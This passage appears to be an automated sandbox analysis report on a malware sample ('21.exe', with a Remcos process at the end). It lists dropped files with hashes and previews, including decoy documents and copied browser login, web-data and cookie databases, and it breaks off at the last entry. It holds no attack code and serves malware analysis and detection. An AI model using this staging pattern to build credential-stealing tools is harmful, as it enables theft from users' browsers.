                                                                                              Preview: SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.xlsx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.696913287597031
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                                                                              MD5:44ECF9E98785299129B35CBDBCAB909B
                                                                                              SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                                                                              SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                                                                              SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.docx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.699088014379539
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                              MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                              SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                              SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                              SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.pdf
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.699088014379539
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                              MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                              SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                              SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                              SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\UOOJJOZIRH.xlsx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.694311754777018
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                              MD5:61908250A5348CC047FF15260F730C2B
                                                                                              SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                              SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                              SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.docx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.690028473124583
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:nCtOJ8AJzDzL/RXD03mp5reBXnqW8rdYu942ZCpjtJHU2coh:nsnA9/Z03y5qXnD0Yz0qjtJpN
                                                                                              MD5:1E5D6B27E451F2406E5ED97F51985EE1
                                                                                              SHA1:EDE59763DC7E1275594BDBB4EF90F9FEE78E946C
                                                                                              SHA-256:A239ED81C44DBF3A8F7F28604058DE45B82FB3D596779B6B889837B2FE34A886
                                                                                              SHA-512:619426DCC7B7C18488EC96D5474A5AA62EE4B1E7B52D8550B6A875AF0A19E02772D30142D9DC6986750732671605C7FF31E1F919CC6D121531ECBF0AE092E215
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: VAMYDFPUNDEKDDABFYGQUEJPDEJQRXUZJGWCCCFXBISLBAZPZFZUOPASIBSPZLUDDUPRUHUUIJHOSYOAZNPTVHZSOVZRGZOUKAQEHTNLFNGLYDYUCGZPLLLOEHMTCCHZKQTFZGYFXUPESPRXRPJCGBDDSERLKFESFYUBNGVYLYUPKGUHNHSJITKDYFMCKPMQIQVZAFMCKDCYROFZHMGJMQRWYUHYHVRTNVUYOJXTDHGZTNEIQMQCBZXDPFJFNGRNBVMQWFGMLOWQCFSJCOQJGHEUOCLNTWHNHAGOTODKZYNINGMKGKTSEOLBKYRISYDHZOZINVXDDFVINOGNYWBEAYTTXSMSWAEGHZLSECWGHVUJJVTTQREREZKVNURFBXKMFFSJVVWOEKHLPTCOWUJHWSDFUKDNLAGSWYUGJMRJXXQRDDRLFRUUNRAXNLOUYXFWKVJGUQJJHPLTQELSOSFVIKIJHQPVLNQGQRDFLHUOUWYTAHHQSFZQBHLQJWUJVJPUBUAQTFOTVGLOZARCSHXCGYQYIDNDEHNFGLALSEIYWKOMVZTQBJZGRBJPSSWZPZKRLWDCYXTKIVIEXXRVZGNCFGSOUZLWFLDVXTEBFKTOHHOOJYSVZPFZXBJVQSOAXJEZIKYMAJHZMJPCAITWVFULTXNZLTXOUQONILVMPIEJGACXWGOEWJOJBLQJHQVHEYUQGLOZPDZOSSPVSZDXLGREZBQIVSASMXXLOQBKYWGPWRRHSSMYHGWBDFPDMXUISJUJUHAMPPRVABJXFEHOJLFPPRVMCBCSXCBNPGOOXIZIQFZDERGWQTALQWJYKPHMFIFYATLSCGMSHBWQYFHEGZQGQPMOIIHVVZQXVAUPPNJCVRKBVFXELRZEQZPLXOQQSXNGDZEGAJZDGSCYSLPQBSDTSQNIRNOZGTIBFJTEPZSUWIUBLEIVPBBHHLLIQQIUIIUARIYFPPNOAZPLXJGSPZJIXJTYLKJEEICOIZEUUYWP
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.xlsx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.690028473124583
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:nCtOJ8AJzDzL/RXD03mp5reBXnqW8rdYu942ZCpjtJHU2coh:nsnA9/Z03y5qXnD0Yz0qjtJpN
                                                                                              MD5:1E5D6B27E451F2406E5ED97F51985EE1
                                                                                              SHA1:EDE59763DC7E1275594BDBB4EF90F9FEE78E946C
                                                                                              SHA-256:A239ED81C44DBF3A8F7F28604058DE45B82FB3D596779B6B889837B2FE34A886
                                                                                              SHA-512:619426DCC7B7C18488EC96D5474A5AA62EE4B1E7B52D8550B6A875AF0A19E02772D30142D9DC6986750732671605C7FF31E1F919CC6D121531ECBF0AE092E215
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: VAMYDFPUNDEKDDABFYGQUEJPDEJQRXUZJGWCCCFXBISLBAZPZFZUOPASIBSPZLUDDUPRUHUUIJHOSYOAZNPTVHZSOVZRGZOUKAQEHTNLFNGLYDYUCGZPLLLOEHMTCCHZKQTFZGYFXUPESPRXRPJCGBDDSERLKFESFYUBNGVYLYUPKGUHNHSJITKDYFMCKPMQIQVZAFMCKDCYROFZHMGJMQRWYUHYHVRTNVUYOJXTDHGZTNEIQMQCBZXDPFJFNGRNBVMQWFGMLOWQCFSJCOQJGHEUOCLNTWHNHAGOTODKZYNINGMKGKTSEOLBKYRISYDHZOZINVXDDFVINOGNYWBEAYTTXSMSWAEGHZLSECWGHVUJJVTTQREREZKVNURFBXKMFFSJVVWOEKHLPTCOWUJHWSDFUKDNLAGSWYUGJMRJXXQRDDRLFRUUNRAXNLOUYXFWKVJGUQJJHPLTQELSOSFVIKIJHQPVLNQGQRDFLHUOUWYTAHHQSFZQBHLQJWUJVJPUBUAQTFOTVGLOZARCSHXCGYQYIDNDEHNFGLALSEIYWKOMVZTQBJZGRBJPSSWZPZKRLWDCYXTKIVIEXXRVZGNCFGSOUZLWFLDVXTEBFKTOHHOOJYSVZPFZXBJVQSOAXJEZIKYMAJHZMJPCAITWVFULTXNZLTXOUQONILVMPIEJGACXWGOEWJOJBLQJHQVHEYUQGLOZPDZOSSPVSZDXLGREZBQIVSASMXXLOQBKYWGPWRRHSSMYHGWBDFPDMXUISJUJUHAMPPRVABJXFEHOJLFPPRVMCBCSXCBNPGOOXIZIQFZDERGWQTALQWJYKPHMFIFYATLSCGMSHBWQYFHEGZQGQPMOIIHVVZQXVAUPPNJCVRKBVFXELRZEQZPLXOQQSXNGDZEGAJZDGSCYSLPQBSDTSQNIRNOZGTIBFJTEPZSUWIUBLEIVPBBHHLLIQQIUIIUARIYFPPNOAZPLXJGSPZJIXJTYLKJEEICOIZEUUYWP
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\ZTGJILHXQB.docx
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.699732953818543
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:84HnNFe3vxyUDFktK2hDYjqaULhRGcVtUEn3iQw3M2qh0eQZnT:JnNk34UDFOt6uashRFVtUEnSQwbrV
                                                                                              MD5:9790C04CE1F6B62202E4E959572AFFDF
                                                                                              SHA1:48829C582A89E6EC74BFD85E01D2B6D73DDE4931
                                                                                              SHA-256:20AB8AFF0DDCBA296F3A9F2D2997DC3BE893ABBDF3B8F177D00FF718FF810B7E
                                                                                              SHA-512:8A702E988A39A50F9E4B8ECDEE15BD8D2B42D7B64D26663787237B83D721C5609B6D43CF2CEBBE3F0E0F44B36744017567B0AE3EBA64E728210D791E35A0DBA2
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ZTGJILHXQBDYANXOJRMTHNAZYEJWWSQMOUZSZDMPOKHAOSBBVKPZGPQYYYFWTHYUPOVLGPRBCMJOKABOUFQRUNCSLBUWHQHWCKJBNSLEKBYSGFLQNFCYSOOCTUPTMHOBQVRJQLHBTRNZVYNQTIJCQLZFVFWQJENWBSFXEGQTZFGKTCXFAERSTJUWBUKFEZZCWBHYCPYTOGPQWDCSXJUDEMFUHRKJBCEKWGYUWKCUJLZNGWAFGUSZJATTGQYULECWSYHFMAJWCTOUCQYTDJGMEUJIXMDEFUZBASTVSKHFKYAQMHJVUJBKUNEBUDWGZWYICPNSQKHKLIYGRWXPZDGTZQLGJEMLSIKUDLOXOTQYFKASRPSSHQEJLDMHJOXHJXMCWCSRSBJNNSKHXAVGHVNKHMXROFSMPJWFKZLJXVUCGYRFNLRCXLJHVEDSCCNKPMFIVDJPIVPOOPVLHIETRYWDPEZHKERGIHEOGISPUBPJNYGTFBITJJMDANWTPGXOIVWBFXGCENAXXTUXHEPQZPXDQZVRRYOKJJTNLYIQMHLRSIZASOUNFSQIWBRQPEPMJUWTSRQDJCLAFGOOKLOOHCUYOWUEGBUNICQSRPNOZCFIERLVGYGFDTKMNYDAPPRFAQXRNCYRLVDKLYPMRXMBQRJZTZBWGJGREIVYIKNRYHOVBXKHXZHPCZMKXFLNMPXXZFTNUPWHKDFHDMXLMDBDEFNDPVUGWVFHGUGURMSQTGEATZDDLJWBTKAXGZDNCCHPPPMVSWBMNTUYYWZPFLNBAPJJDYFQHFXBCHLEHUMGUNHRYXADUJLASWWJAWHMHLKHKYKXNVLXGJNTLZSQBDQABIFRDLCBSFZEMOGPQRZQFSYVIXQJRDSSLMPYIAQPAWAMTUXHSORDJHRLGGGGBGOCCVVAEIEQUBGFQCKVJHQBWPHHQNWDRJITUELVKGFPWZQSBWIWQHACSGDUHPOGGZNNNQTSKYOEUZIIREXQOJCFJCFQ
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\LoginData
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.792852251086831
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\SQLite3_StdCall.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):60416
                                                                                              Entropy (8bit):6.476799607351969
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:iwxijL3LxouSmW7Z534ZO1z0/AgqWgjKDv01FoMRxrU:iwxiFNWdVOv/BijKavRK
                                                                                              MD5:D77B227A28A78627C2323CAC75948390
                                                                                              SHA1:E228C3951F2A9FD0FEBFE07390633AB4F35727F4
                                                                                              SHA-256:527EC201DCD7695BD9830EB82AB35A3986121DE9EA156193834AED9D79223B82
                                                                                              SHA-512:5627FBC8BBB98F644E21F101A68F0E0B07B87C264D00EA227286BED8AB6DD4EBF5114F03B632604F775FF93666A409A1A179A81EBFC9246956BA8150FF5B0587
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B-.J#C.J#C.J#C.C[.Q#C.C[.Y#C.C[...#C.m.8.H#C.Q..I#C.J#B.0#C.C[.I#C.C[.K#C.C[.K#C.RichJ#C.................PE..L...!<.N...........!.........J............................................... ..............................................,...<......................................................................@............................................text...|........................... ..`.rdata...).......*..................@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\WebData
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):73728
                                                                                              Entropy (8bit):1.1874185457069584
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\cookies
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.7006690334145785
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                              MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                              SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                              SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                              SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\sqlite3.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):599419
                                                                                              Entropy (8bit):6.490720742062744
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:OQwLOkFyRUXeqQg1vTuOv43WZfyy9IQoqyRHPvKftzTFJKs/:OetRUXeE1buOv4GZaQI9RHiJKs/
                                                                                              MD5:5405413FFF79B8D9C747AA900F60F082
                                                                                              SHA1:71CAF8907DDD9A3A25D71356BD2CE09BD293BD78
                                                                                              SHA-256:3E5A28FFDE07AC661C26B6CCF94E64C1C90B1F25B3B24C90605AA922B87642EB
                                                                                              SHA-512:2F09A30FC4DA5166BD665210FEFA1D44CE344F0EC6A37F127D677AEB3CA4FC0D09B7C9C1540F57DA1E3449B7F588A1C61115395E965FA153D4BAA5033266ED66
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....O...........!.....8...<......X........P.....`.................................[........ ...................... .......@..8............................p...$...........................`.......................A..l............................text....6.......8..................`.0`.data...<....P.......>..............@.0..rdata.......`.......N..............@.@@.bss..................................@..edata....... ......................@.0@.idata..8....@......................@.0..CRT.........P......................@.0..tls.... ....`......................@.0..reloc...$...p...&..................@.0B/4......`............B..............@.@B/19..................D..............@..B/35.....M............H..............@..B/51......C.......D...P..............@..B/63.......... ......................@..B/77..........0......................@..B/89..........@..........
                                                                                              C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
